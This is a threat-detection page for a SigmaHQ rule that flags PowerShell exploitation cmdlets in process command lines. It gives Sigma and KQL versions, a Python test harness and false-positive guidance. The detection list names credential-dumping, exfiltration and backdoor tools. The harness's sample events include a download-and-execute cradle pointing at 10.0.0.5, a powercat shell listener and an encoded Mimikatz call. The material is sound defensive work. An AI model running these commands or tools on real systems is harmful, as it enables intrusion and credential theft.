
Malicious PowerShell Commandlets - ProcessCreation

Format: Sigma · Level: high · Source: SigmaHQ
ATT&CK: T1482, T1087, T1087.001, T1087.002, T1069.001, T1069.002, T1069, T1059.001
Sentinel table: imProcessCreate
Tags: exploit, powershell
This rule was pulled from an open-source repository and enriched with AI. Validate in a test environment before deploying to production.
Retrieved: 2026-05-12T23:00:00Z · Confidence: medium

Hunt Hypothesis

Detects cmdlet names from well-known PowerShell exploitation and post-exploitation frameworks (PowerView, Nishang, PowerSharpPack, Powermad, ADRecon, powercat and the other projects referenced in the rule) appearing in the command line of a newly created process.

Detection Rule

Sigma (Original)

title: Malicious PowerShell Commandlets - ProcessCreation
id: 02030f2f-6199-49ec-b258-ea71b07e03dc
related:
    - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
      type: derived
    - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c
      type: similar
status: test
description: Detects Commandlet names from well-known PowerShell exploitation frameworks
references:
    - https://adsecurity.org/?p=2921
    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1
    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1
    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1
    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1
    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec
    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec
    - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare
    - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1
    - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html
    - https://github.com/HarmJ0y/DAMP
    - https://github.com/samratashok/nishang
    - https://github.com/DarkCoderSc/PowerRunAsSystem/
    - https://github.com/besimorhino/powercat
    - https://github.com/Kevin-Robertson/Powermad
    - https://github.com/adrecon/ADRecon
    - https://github.com/adrecon/AzureADRecon
    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1
    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/
    - https://github.com/Arno0x/DNSExfiltrator/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-02
modified: 2025-12-10
tags:
    - attack.execution
    - attack.discovery
    - attack.t1482
    - attack.t1087
    - attack.t1087.001
    - attack.t1087.002
    - attack.t1069.001
    - attack.t1069.002
    - attack.t1069
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        # Note: Please ensure alphabetical order when adding new entries
        CommandLine|contains:
            - 'Add-Exfiltration'
            - 'Add-Persistence'
            - 'Add-RegBackdoor'
            - 'Add-RemoteRegBackdoor'
            - 'Add-ScrnSaveBackdoor'
            - 'Check-VM'
            - 'ConvertTo-Rc4ByteStream'
            - 'Decrypt-Hash'
            - 'Disable-ADIDNSNode'
            - 'Disable-MachineAccount'
            - 'Do-Exfiltration'
            - 'Enable-ADIDNSNode'
            - 'Enable-MachineAccount'
            - 'Enabled-DuplicateToken'
            - 'Exploit-Jboss'
            - 'Export-ADR'
            - 'Export-ADRCSV'
            - 'Export-ADRExcel'
            - 'Export-ADRHTML'
            - 'Export-ADRJSON'
            - 'Export-ADRXML'
            - 'Find-Fruit'
            - 'Find-GPOLocation'
            - 'Find-TrustedDocuments'
            - 'Get-ADIDNS' # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone
            - 'Get-ApplicationHost'
            - 'Get-ChromeDump'
            - 'Get-ClipboardContents'
            - 'Get-FoxDump'
            - 'Get-GPPPassword'
            - 'Get-IndexedItem'
            - 'Get-KerberosAESKey'
            - 'Get-Keystrokes'
            - 'Get-LSASecret'
            - 'Get-MachineAccountAttribute'
            - 'Get-MachineAccountCreator'
            - 'Get-PassHashes'
            - 'Get-RegAlwaysInstallElevated'
            - 'Get-RegAutoLogon'
            - 'Get-RemoteBootKey'
            - 'Get-RemoteCachedCredential'
            - 'Get-RemoteLocalAccountHash'
            - 'Get-RemoteLSAKey'
            - 'Get-RemoteMachineAccountHash'
            - 'Get-RemoteNLKMKey'
            - 'Get-RickAstley'
            - 'Get-Screenshot'
            - 'Get-SecurityPackages'
            - 'Get-ServiceFilePermission'
            - 'Get-ServicePermission'
            - 'Get-ServiceUnquoted'
            - 'Get-SiteListPassword'
            - 'Get-System'
            - 'Get-TimedScreenshot'
            - 'Get-UnattendedInstallFile'
            - 'Get-Unconstrained'
            - 'Get-USBKeystrokes'
            - 'Get-VaultCredential'
            - 'Get-VulnAutoRun'
            - 'Get-VulnSchTask'
            - 'Grant-ADIDNSPermission'
            - 'Gupt-Backdoor'
            - 'HTTP-Login'
            - 'Install-ServiceBinary'
            - 'Install-SSP'
            - 'Invoke-ACLScanner'
            - 'Invoke-ADRecon'
            - 'Invoke-ADSBackdoor'
            - 'Invoke-AgentSmith'
            - 'Invoke-AllChecks'
            - 'Invoke-ARPScan'
            - 'Invoke-AzureHound'
            - 'Invoke-BackdoorLNK'
            - 'Invoke-BadPotato'
            - 'Invoke-BetterSafetyKatz'
            - 'Invoke-BypassUAC'
            - 'Invoke-Carbuncle'
            - 'Invoke-Certify'
            - 'Invoke-ConPtyShell'
            - 'Invoke-CredentialInjection'
            - 'Invoke-DAFT'
            - 'Invoke-DCSync'
            - 'Invoke-DinvokeKatz'
            - 'Invoke-DllInjection'
            - 'Invoke-DNSUpdate'
            - 'Invoke-DNSExfiltrator'
            - 'Invoke-DomainPasswordSpray'
            - 'Invoke-DowngradeAccount'
            - 'Invoke-EgressCheck'
            - 'Invoke-Eyewitness'
            - 'Invoke-FakeLogonScreen'
            - 'Invoke-Farmer'
            - 'Invoke-Get-RBCD-Threaded'
            - 'Invoke-Gopher'
            - 'Invoke-Grouper' # Also Covers Invoke-GrouperX
            - 'Invoke-HandleKatz'
            - 'Invoke-ImpersonatedProcess'
            - 'Invoke-ImpersonateSystem'
            - 'Invoke-InteractiveSystemPowerShell'
            - 'Invoke-Internalmonologue'
            - 'Invoke-Inveigh'
            - 'Invoke-InveighRelay'
            - 'Invoke-KrbRelay'
            - 'Invoke-LdapSignCheck'
            - 'Invoke-Lockless'
            - 'Invoke-MalSCCM'
            - 'Invoke-Mimikatz'
            - 'Invoke-Mimikittenz'
            - 'Invoke-MITM6'
            - 'Invoke-NanoDump'
            - 'Invoke-NetRipper'
            - 'Invoke-Nightmare'
            - 'Invoke-NinjaCopy'
            - 'Invoke-OfficeScrape'
            - 'Invoke-OxidResolver'
            - 'Invoke-P0wnedshell'
            - 'Invoke-Paranoia'
            - 'Invoke-PortScan'
            - 'Invoke-PoshRatHttp' # Also Covers Invoke-PoshRatHttps
            - 'Invoke-PostExfil'
            - 'Invoke-PowerDump'
            - 'Invoke-PowerDPAPI'
            - 'Invoke-PowerShellTCP'
            - 'Invoke-PowerShellWMI'
            - 'Invoke-PPLDump'
            - 'Invoke-PsExec'
            - 'Invoke-PSInject'
            - 'Invoke-PsUaCme'
            - 'Invoke-ReflectivePEInjection'
            - 'Invoke-ReverseDNSLookup'
            - 'Invoke-Rubeus'
            - 'Invoke-RunAs'
            - 'Invoke-SafetyKatz'
            - 'Invoke-SauronEye'
            - 'Invoke-SCShell'
            - 'Invoke-Seatbelt'
            - 'Invoke-ServiceAbuse'
            - 'Invoke-ShadowSpray'
            - 'Invoke-Sharp' # Covers all "Invoke-Sharp" variants
            - 'Invoke-Shellcode'
            - 'Invoke-SMBScanner'
            - 'Invoke-Snaffler'
            - 'Invoke-Spoolsample'
            - 'Invoke-SpraySinglePassword'
            - 'Invoke-SSHCommand'
            - 'Invoke-StandIn'
            - 'Invoke-StickyNotesExtract'
            - 'Invoke-SystemCommand'
            - 'Invoke-Tasksbackdoor'
            - 'Invoke-Tater'
            - 'Invoke-Thunderfox'
            - 'Invoke-ThunderStruck'
            - 'Invoke-TokenManipulation'
            - 'Invoke-Tokenvator'
            - 'Invoke-TotalExec'
            - 'Invoke-UrbanBishop'
            - 'Invoke-UserHunter'
            - 'Invoke-VoiceTroll'
            - 'Invoke-Whisker'
            - 'Invoke-WinEnum'
            - 'Invoke-winPEAS'
            - 'Invoke-WireTap'
            - 'Invoke-WmiCommand'
            - 'Invoke-WMIExec'
            - 'Invoke-WScriptBypassUAC'
            - 'Invoke-Zerologon'
            - 'MailRaider'
            - 'New-ADIDNSNode'
            - 'New-DNSRecordArray'
            - 'New-HoneyHash'
            - 'New-InMemoryModule'
            - 'New-MachineAccount'
            - 'New-SOASerialNumberArray'
            - 'Out-Minidump'
            - 'Port-Scan'
            - 'PowerBreach'
            - 'powercat '
            - 'PowerUp'
            - 'PowerView'
            - 'Remove-ADIDNSNode'
            - 'Remove-MachineAccount'
            - 'Remove-Update'
            - 'Rename-ADIDNSNode'
            - 'Revoke-ADIDNSPermission'
            - 'Set-ADIDNSNode' # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner
            - 'Set-MacAttribute'
            - 'Set-MachineAccountAttribute'
            - 'Set-Wallpaper'
            - 'Show-TargetScreen'
            - 'Start-CaptureServer'
            - 'Start-Dnscat2'
            - 'Start-WebcamRecorder'
            - 'Veeam-Get-Creds'
            - 'VolumeShadowCopyTools'
    condition: selection
falsepositives:
    - Unknown
level: high
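
The rule's CommandLine|contains list is a set of case-insensitive substring tests, and that detail decides what it catches and what it misses. The following Python is an added example, not code from SigmaHQ or from this page: it applies that matching to a handful of constructed imProcessCreate-style events using a small subset of the rule's entries (the full list is in the Sigma rule above), shows the prefix entries and the trailing-space 'powercat ' entry at work, includes one benign cmdlet that collides with 'Get-System', and then decodes a -EncodedCommand payload to show what the raw command-line match cannot see. The event dictionaries, the 10.0.0.5 URL and the helper function names are constructed for this example.

```python
# Added example (not part of the SigmaHQ rule or this page's original content):
# applies the rule's CommandLine|contains logic to constructed process-creation
# events and shows where raw command-line matching stops.
import base64
import re
from typing import Dict, List, Optional

# Representative subset of the rule's list; the full list is in the Sigma rule above.
# 'Get-ADIDNS' and 'Invoke-Sharp' are deliberate prefixes in the original rule, and
# the trailing space in 'powercat ' is also the rule's own.
CMDLETS = [
    "Get-ADIDNS",
    "Get-System",
    "Invoke-Mimikatz",
    "Invoke-Sharp",
    "Invoke-UserHunter",
    "PowerView",
    "powercat ",
]


def matched_cmdlets(cmdline: str, patterns: List[str] = CMDLETS) -> List[str]:
    """Sigma 'contains' is a case-insensitive substring test; KQL 'contains' behaves the same."""
    haystack = cmdline.lower()
    return [p for p in patterns if p.lower() in haystack]


# -EncodedCommand and its common short forms. PowerShell also accepts other
# unambiguous prefixes, which this regex does not try to enumerate.
_ENC = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script passed via -EncodedCommand (Base64 over UTF-16LE text)."""
    m = _ENC.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script: str) -> str:
    """Produce a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def evaluate(event: Dict[str, str]) -> Dict[str, List[str]]:
    """Run the rule on one imProcessCreate-shaped event, then again on the decoded
    -EncodedCommand payload, which the raw command-line match never sees."""
    cmdline = event["TargetProcessCommandLine"]
    decoded = decode_encoded_command(cmdline)
    return {
        "raw_hits": matched_cmdlets(cmdline),
        "decoded_hits": matched_cmdlets(decoded) if decoded else [],
    }


# Constructed sample events (not real telemetry). Only the field the rule reads is filled.
EVENTS = [
    # PowerView download cradle plus a PowerView function: two raw hits.
    {"TargetProcessCommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://10.0.0.5/PowerView.ps1'); Invoke-UserHunter -Stealth\""},
    # Powermad cmdlet caught by the 'Get-ADIDNS' prefix entry.
    {"TargetProcessCommandLine": "powershell.exe -Command \"Get-ADIDNSZone -Domain corp.example\""},
    # 'Invoke-Mimikatz -DumpCreds' as UTF-16LE Base64: invisible to the raw match.
    {"TargetProcessCommandLine": "powershell.exe -NoP -EncodedCommand "
     "SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEQAdQBtAHAAQwByAGUAZABzAA=="},
    # powercat listener: matched by the trailing-space entry.
    {"TargetProcessCommandLine": "powershell.exe -c \"powercat -l -p 4444 -e cmd.exe\""},
    # Loading powercat.ps1 from disk: 'powercat ' (with the space) never occurs, so no hit.
    {"TargetProcessCommandLine": "powershell.exe -c \"Import-Module C:\\Tools\\powercat.ps1\""},
    # Legitimate ConfigCI cmdlet that happens to contain 'Get-System': a false positive.
    {"TargetProcessCommandLine": "powershell.exe -c \"Get-SystemDriver -ScanPath C:\\Windows\\System32 -UserPEs\""},
    # Mixed case and a SharpHound wrapper: 'Invoke-Sharp' prefix, matched case-insensitively.
    {"TargetProcessCommandLine": "POWERSHELL.EXE -Command invoke-sharphound -c All"},
]


def run(events: List[Dict[str, str]] = EVENTS) -> List[Dict[str, List[str]]]:
    """Evaluate every sample event; returns one result dict per event, in order."""
    return [evaluate(e) for e in events]


if __name__ == "__main__":
    for event, result in zip(EVENTS, run()):
        print(result, "<-", event["TargetProcessCommandLine"][:70])
```

The third event is the one to keep in mind when reading the Sigma and KQL above: the process-creation event carries only the Base64 blob, so nothing in the rule's list fires, and only decoding the argument (or matching the same list against Script Block Logging, Event ID 4104) recovers Invoke-Mimikatz. The sixth event is the flip side, a legitimate cmdlet tripping a short entry, which is the usual source of noise for substring rules.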

KQL (Azure Sentinel)

imProcessCreate
| where TargetProcessCommandLine contains "Add-Exfiltration" or TargetProcessCommandLine contains "Add-Persistence" or TargetProcessCommandLine contains "Add-RegBackdoor" or TargetProcessCommandLine contains "Add-RemoteRegBackdoor" or TargetProcessCommandLine contains "Add-ScrnSaveBackdoor" or TargetProcessCommandLine contains "Check-VM" or TargetProcessCommandLine contains "ConvertTo-Rc4ByteStream" or TargetProcessCommandLine contains "Decrypt-Hash" or TargetProcessCommandLine contains "Disable-ADIDNSNode" or TargetProcessCommandLine contains "Disable-MachineAccount" or TargetProcessCommandLine contains "Do-Exfiltration" or TargetProcessCommandLine contains "Enable-ADIDNSNode" or TargetProcessCommandLine contains "Enable-MachineAccount" or TargetProcessCommandLine contains "Enabled-DuplicateToken" or TargetProcessCommandLine contains "Exploit-Jboss" or TargetProcessCommandLine contains "Export-ADR" or TargetProcessCommandLine contains "Export-ADRCSV" or TargetProcessCommandLine contains "Export-ADRExcel" or TargetProcessCommandLine contains "Export-ADRHTML" or TargetProcessCommandLine contains "Export-ADRJSON" or TargetProcessCommandLine contains "Export-ADRXML" or TargetProcessCommandLine contains "Find-Fruit" or TargetProcessCommandLine contains "Find-GPOLocation" or TargetProcessCommandLine contains "Find-TrustedDocuments" or TargetProcessCommandLine contains "Get-ADIDNS" or TargetProcessCommandLine contains "Get-ApplicationHost" or TargetProcessCommandLine contains "Get-ChromeDump" or TargetProcessCommandLine contains "Get-ClipboardContents" or TargetProcessCommandLine contains "Get-FoxDump" or TargetProcessCommandLine contains "Get-GPPPassword" or TargetProcessCommandLine contains "Get-IndexedItem" or TargetProcessCommandLine contains "Get-KerberosAESKey" or TargetProcessCommandLine contains "Get-Keystrokes" or TargetProcessCommandLine contains "Get-LSASecret" or TargetProcessCommandLine contains "Get-MachineAccountAttribute" or TargetProcessCommandLine 
contains "Get-MachineAccountCreator" or TargetProcessCommandLine contains "Get-PassHashes" or TargetProcessCommandLine contains "Get-RegAlwaysInstallElevated" or TargetProcessCommandLine contains "Get-RegAutoLogon" or TargetProcessCommandLine contains "Get-RemoteBootKey" or TargetProcessCommandLine contains "Get-RemoteCachedCredential" or TargetProcessCommandLine contains "Get-RemoteLocalAccountHash" or TargetProcessCommandLine contains "Get-RemoteLSAKey" or TargetProcessCommandLine contains "Get-RemoteMachineAccountHash" or TargetProcessCommandLine contains "Get-RemoteNLKMKey" or TargetProcessCommandLine contains "Get-RickAstley" or TargetProcessCommandLine contains "Get-Screenshot" or TargetProcessCommandLine contains "Get-SecurityPackages" or TargetProcessCommandLine contains "Get-ServiceFilePermission" or TargetProcessCommandLine contains "Get-ServicePermission" or TargetProcessCommandLine contains "Get-ServiceUnquoted" or TargetProcessCommandLine contains "Get-SiteListPassword" or TargetProcessCommandLine contains "Get-System" or TargetProcessCommandLine contains "Get-TimedScreenshot" or TargetProcessCommandLine contains "Get-UnattendedInstallFile" or TargetProcessCommandLine contains "Get-Unconstrained" or TargetProcessCommandLine contains "Get-USBKeystrokes" or TargetProcessCommandLine contains "Get-VaultCredential" or TargetProcessCommandLine contains "Get-VulnAutoRun" or TargetProcessCommandLine contains "Get-VulnSchTask" or TargetProcessCommandLine contains "Grant-ADIDNSPermission" or TargetProcessCommandLine contains "Gupt-Backdoor" or TargetProcessCommandLine contains "HTTP-Login" or TargetProcessCommandLine contains "Install-ServiceBinary" or TargetProcessCommandLine contains "Install-SSP" or TargetProcessCommandLine contains "Invoke-ACLScanner" or TargetProcessCommandLine contains "Invoke-ADRecon" or TargetProcessCommandLine contains "Invoke-ADSBackdoor" or TargetProcessCommandLine contains "Invoke-AgentSmith" or TargetProcessCommandLine contains 
"Invoke-AllChecks" or TargetProcessCommandLine contains "Invoke-ARPScan" or TargetProcessCommandLine contains "Invoke-AzureHound" or TargetProcessCommandLine contains "Invoke-BackdoorLNK" or TargetProcessCommandLine contains "Invoke-BadPotato" or TargetProcessCommandLine contains "Invoke-BetterSafetyKatz" or TargetProcessCommandLine contains "Invoke-BypassUAC" or TargetProcessCommandLine contains "Invoke-Carbuncle" or TargetProcessCommandLine contains "Invoke-Certify" or TargetProcessCommandLine contains "Invoke-ConPtyShell" or TargetProcessCommandLine contains "Invoke-CredentialInjection" or TargetProcessCommandLine contains "Invoke-DAFT" or TargetProcessCommandLine contains "Invoke-DCSync" or TargetProcessCommandLine contains "Invoke-DinvokeKatz" or TargetProcessCommandLine contains "Invoke-DllInjection" or TargetProcessCommandLine contains "Invoke-DNSUpdate" or TargetProcessCommandLine contains "Invoke-DNSExfiltrator" or TargetProcessCommandLine contains "Invoke-DomainPasswordSpray" or TargetProcessCommandLine contains "Invoke-DowngradeAccount" or TargetProcessCommandLine contains "Invoke-EgressCheck" or TargetProcessCommandLine contains "Invoke-Eyewitness" or TargetProcessCommandLine contains "Invoke-FakeLogonScreen" or TargetProcessCommandLine contains "Invoke-Farmer" or TargetProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or TargetProcessCommandLine contains "Invoke-Gopher" or TargetProcessCommandLine contains "Invoke-Grouper" or TargetProcessCommandLine contains "Invoke-HandleKatz" or TargetProcessCommandLine contains "Invoke-ImpersonatedProcess" or TargetProcessCommandLine contains "Invoke-ImpersonateSystem" or TargetProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or TargetProcessCommandLine contains "Invoke-Internalmonologue" or TargetProcessCommandLine contains "Invoke-Inveigh" or TargetProcessCommandLine contains "Invoke-InveighRelay" or TargetProcessCommandLine contains "Invoke-KrbRelay" or TargetProcessCommandLine contains 
"Invoke-LdapSignCheck" or TargetProcessCommandLine contains "Invoke-Lockless" or TargetProcessCommandLine contains "Invoke-MalSCCM" or TargetProcessCommandLine contains "Invoke-Mimikatz" or TargetProcessCommandLine contains "Invoke-Mimikittenz" or TargetProcessCommandLine contains "Invoke-MITM6" or TargetProcessCommandLine contains "Invoke-NanoDump" or TargetProcessCommandLine contains "Invoke-NetRipper" or TargetProcessCommandLine contains "Invoke-Nightmare" or TargetProcessCommandLine contains "Invoke-NinjaCopy" or TargetProcessCommandLine contains "Invoke-OfficeScrape" or TargetProcessCommandLine contains "Invoke-OxidResolver" or TargetProcessCommandLine contains "Invoke-P0wnedshell" or TargetProcessCommandLine contains "Invoke-Paranoia" or TargetProcessCommandLine contains "Invoke-PortScan" or TargetProcessCommandLine contains "Invoke-PoshRatHttp" or TargetProcessCommandLine contains "Invoke-PostExfil" or TargetProcessCommandLine contains "Invoke-PowerDump" or TargetProcessCommandLine contains "Invoke-PowerDPAPI" or TargetProcessCommandLine contains "Invoke-PowerShellTCP" or TargetProcessCommandLine contains "Invoke-PowerShellWMI" or TargetProcessCommandLine contains "Invoke-PPLDump" or TargetProcessCommandLine contains "Invoke-PsExec" or TargetProcessCommandLine contains "Invoke-PSInject" or TargetProcessCommandLine contains "Invoke-PsUaCme" or TargetProcessCommandLine contains "Invoke-ReflectivePEInjection" or TargetProcessCommandLine contains "Invoke-ReverseDNSLookup" or TargetProcessCommandLine contains "Invoke-Rubeus" or TargetProcessCommandLine contains "Invoke-RunAs" or TargetProcessCommandLine contains "Invoke-SafetyKatz" or TargetProcessCommandLine contains "Invoke-SauronEye" or TargetProcessCommandLine contains "Invoke-SCShell" or TargetProcessCommandLine contains "Invoke-Seatbelt" or TargetProcessCommandLine contains "Invoke-ServiceAbuse" or TargetProcessCommandLine contains "Invoke-ShadowSpray" or TargetProcessCommandLine contains "Invoke-Sharp" or 
TargetProcessCommandLine contains "Invoke-Shellcode" or TargetProcessCommandLine contains "Invoke-SMBScanner" or TargetProcessCommandLine contains "Invoke-Snaffler" or TargetProcessCommandLine contains "Invoke-Spoolsample" or TargetProcessCommandLine contains "Invoke-SpraySinglePassword" or TargetProcessCommandLine contains "Invoke-SSHCommand" or TargetProcessCommandLine contains "Invoke-StandIn" or TargetProcessCommandLine contains "Invoke-StickyNotesExtract" or TargetProcessCommandLine contains "Invoke-SystemCommand" or TargetProcessCommandLine contains "Invoke-Tasksbackdoor" or TargetProcessCommandLine contains "Invoke-Tater" or TargetProcessCommandLine contains "Invoke-Thunderfox" or TargetProcessCommandLine contains "Invoke-ThunderStruck" or TargetProcessCommandLine contains "Invoke-TokenManipulation" or TargetProcessCommandLine contains "Invoke-Tokenvator" or TargetProcessCommandLine contains "Invoke-TotalExec" or TargetProcessCommandLine contains "Invoke-UrbanBishop" or TargetProcessCommandLine contains "Invoke-UserHunter" or TargetProcessCommandLine contains "Invoke-VoiceTroll" or TargetProcessCommandLine contains "Invoke-Whisker" or TargetProcessCommandLine contains "Invoke-WinEnum" or TargetProcessCommandLine contains "Invoke-winPEAS" or TargetProcessCommandLine contains "Invoke-WireTap" or TargetProcessCommandLine contains "Invoke-WmiCommand" or TargetProcessCommandLine contains "Invoke-WMIExec" or TargetProcessCommandLine contains "Invoke-WScriptBypassUAC" or TargetProcessCommandLine contains "Invoke-Zerologon" or TargetProcessCommandLine contains "MailRaider" or TargetProcessCommandLine contains "New-ADIDNSNode" or TargetProcessCommandLine contains "New-DNSRecordArray" or TargetProcessCommandLine contains "New-HoneyHash" or TargetProcessCommandLine contains "New-InMemoryModule" or TargetProcessCommandLine contains "New-MachineAccount" or TargetProcessCommandLine contains "New-SOASerialNumberArray" or TargetProcessCommandLine contains "Out-Minidump" or 
TargetProcessCommandLine contains "Port-Scan" or TargetProcessCommandLine contains "PowerBreach" or TargetProcessCommandLine contains "powercat " or TargetProcessCommandLine contains "PowerUp" or TargetProcessCommandLine contains "PowerView" or TargetProcessCommandLine contains "Remove-ADIDNSNode" or TargetProcessCommandLine contains "Remove-MachineAccount" or TargetProcessCommandLine contains "Remove-Update" or TargetProcessCommandLine contains "Rename-ADIDNSNode" or TargetProcessCommandLine contains "Revoke-ADIDNSPermission" or TargetProcessCommandLine contains "Set-ADIDNSNode" or TargetProcessCommandLine contains "Set-MacAttribute" or TargetProcessCommandLine contains "Set-MachineAccountAttribute" or TargetProcessCommandLine contains "Set-Wallpaper" or TargetProcessCommandLine contains "Show-TargetScreen" or TargetProcessCommandLine contains "Start-CaptureServer" or TargetProcessCommandLine contains "Start-Dnscat2" or TargetProcessCommandLine contains "Start-WebcamRecorder" or TargetProcessCommandLine contains "Veeam-Get-Creds" or TargetProcessCommandLine contains "VolumeShadowCopyTools"

Required Data Sources

Sentinel Table: imProcessCreate
Notes: Ensure this data connector is enabled. imProcessCreate is the ASIM process-creation parser, so the underlying source must itself record the command line: Sysmon Event ID 1 does so by default, while Security Event ID 4688 only includes it when "Include command line in process creation events" is enabled alongside Audit Process Creation. Without the command line this rule cannot match anything.

False Positive Guidance

The original rule lists false positives as Unknown. Every entry is a case-insensitive substring match against the whole command line, so the short or generic entries (PowerUp, PowerView, Get-System, Port-Scan, HTTP-Login, MailRaider, Remove-Update, Set-Wallpaper) are the ones most likely to collide with in-house scripts or unrelated cmdlets; Get-SystemDriver from the ConfigCI module, for instance, contains Get-System. Authorized security work (ADRecon exports, Seatbelt, BloodHound and AzureHound collection, Snaffler) will also fire and is best handled by excluding the hosts and accounts the security team uses rather than by pruning entries. The rule only sees what is on the command line: a Base64 -EncodedCommand payload, a script pulled down and run through IEX, or a cmdlet name assembled at runtime leaves none of these strings in the process-creation event, so pair this rule with PowerShell Script Block Logging (Event ID 4104), where the same list can be matched against the script content.

MITRE ATT&CK Context

Execution: T1059.001 Command and Scripting Interpreter: PowerShell
Discovery: T1482 Domain Trust Discovery; T1087 Account Discovery (T1087.001 Local Account, T1087.002 Domain Account); T1069 Permission Groups Discovery (T1069.001 Local Groups, T1069.002 Domain Groups)

Many entries in the list reach well beyond discovery (credential dumping, token manipulation, persistence, lateral movement); the tags above are the ones the rule author chose to map, not an exhaustive coverage claim.

References

Original source: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml